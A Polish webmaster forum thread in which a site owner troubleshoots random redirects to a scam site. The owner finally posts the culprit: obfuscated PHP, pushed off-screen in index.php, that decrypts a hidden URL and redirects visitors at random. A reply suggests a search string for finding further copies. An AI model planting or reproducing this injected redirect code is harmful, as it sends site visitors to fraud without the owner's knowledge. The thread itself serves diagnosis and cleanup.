Dziwne przekierowanie na hostujemy... Opcje

[godlesowned]

Witam, nie wiedziałem za bardzo gdzie zadać to pytanie ale sprawa wydaje się dość dziwna i poważna.
Na mojej stronie od wczoraj często występuje przekierowanie na oszustów z hostujmy.pl
Oczywiście wiem że strona to jeden wielki wałek, jestem w 100% pewien że nie mam na komputerze żadnych wirusów ani złośliwego oprogramowania za pomocą którego ktoś mógłby wejść na FTP czy bazę danych. Problem występuje w różnych przypadkach, gdy ktoś kliknie w przycisk "zaloguj się" lub po prostu kliknie jakikolwiek button na stronie.
Przejrzałem każdy plik na FTP i wszystko jest czyste.
Gdzie mogę szukać jakichkolwiek rozwiązań tego problemu? Gdzie jeszcze mogło się zapuścić takie przekierowanie?

[KsaR]

Moze jakis XSS?(cross site scripting - np. W bazie danych) najlepiej jakbys podal URL twojej strony bo ciezko tak wróżyć.

Ten post edytował KsaR 24.10.2015, 18:15:04

[godlesowned]

Niestety wolę nie podawać strony, treść może nie spodobać się wielu osobom czytającym forum.

Jest to bardzo dziwne ponieważ, właśnie poprosiłem znajomego żeby to sprawdził. Odświeżył stronę 14 razy i nic nie wyskoczyło a za 15 tak...
Skoro wyskakuje to absolutnie losowo to skąd to się wzięło? Baza Danych jest również czysta.

Ten post edytował godlesowned 25.10.2015, 12:32:31

[Pyton_000]

O ile to nie porno, warez, spam albo jakieś inne treści wątpliwej natury prawnej to nie widzę problemu. Ew. ślij na PW

[godlesowned]

Podesłałem obu panom na PW. Proszę o nie wnikanie w treści strony jak i inne sprawy z tym związane. Jedynie czego szukamy to rozwiązania w/w problemu.
EDIT:
Problem został rozwiązany. Jednak było to na FTP w dwóch pierwszych linijkach indexu. Kod był bardzo ładnie ułożony dlatego nikt nie zwrócił uwagi na to że można przesunąć w prawo i daleko na prawo w dwóch pierwszych linijkach był dziwny kod który usunąłem i jest OK.
Oto kod który się nam chował

[PHP] pobierz, plaintext 
<?php function decryptIt( $q ) { $cryptKey  = 'qJB0rGtIn5UB1xG03efyCp'; $qDecoded = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_256, md5( $cryptKey ), base64_decode( $q ), MCRYPT_MODE_CBC, md5( md5( $cryptKey ) ) ), "\0"); return( $qDecoded ); } $s = decryptIt("i8LJ6SwPrYsSeDM0dB1f/TQGqvVcbrmrWcdQMw24MnQ_2dan9ndkB1DExmMOc8hbmbL+WrdbjQE5Yy99Ap9HthwT1A=="); $p = rand(14, 20);  if ($p==16) {  header("location: ".$s); } ?>
[PHP] pobierz, plaintext 

Ten post edytował godlesowned 26.10.2015, 11:25:27

[Pyton_000]

Przeszukaj kos strony i bazę pod kątem "jIwMDE"